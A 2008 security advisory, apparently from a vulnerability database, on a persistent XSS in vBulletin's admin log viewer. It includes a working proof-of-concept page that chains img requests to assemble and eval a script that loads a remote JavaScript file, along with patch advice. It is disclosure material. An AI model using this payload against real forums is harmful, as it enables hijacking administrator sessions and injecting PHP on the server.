XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

2008.07.08
Credit: Jessica Hope
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

====================================================================== Advisory : XSS in admin logs Release Date : July 06th 2008 Application : vBulletin Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors : Jessica Hope (jessicasaulhope_at_googlemail&#46;com), Friends who wish to remain anonymous. ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging. ======================================================================= Discussion The XSS in question exists on the log viewing page of the admin control panel. When a missing page is requested, a log is created in the admin area, however the inputs to this log lack sanitation. The script name is taken from basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one can be used for introducing XSS vectors. To highlight the severity and underline the fact that his vulnerability is exploitable: <html> <body> <img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script '/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*" /> <!--edit to match your data --> <img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*" /> <!-- end edit --> <img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" /> </body> </html> You then need to send the admin to adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1 and the XSS will render. The limits on the XSS: basename(PHP_SELF) is 50 characters max and no slashes _REQUEST['do'] is limited to 20 characters, but no character restriction. The tight character limits on the unsanitized parameters are not mitigating the severity, as unlimited attack space can be obtained as shown above. As per my last exploits, all XSS in the vBulletin ACP can be used for PHP injection instantly. This is due to the design of the vBulletin hooks feature. As this particular XSS is persistent and will render in all major browsers it is particularly dangerous. ======================================================================= Solution: Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3 Don't trust PHP_SELF and sanitise all data that is going to be displayed to the user =======================================================================

References:

http://www.vbulletin.com/forum/showthread.php?t=277945
http://www.securityfocus.com/bid/30134
http://www.securityfocus.com/archive/1/archive/1/494049/100/0/threaded
http://secunia.com/advisories/30991


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top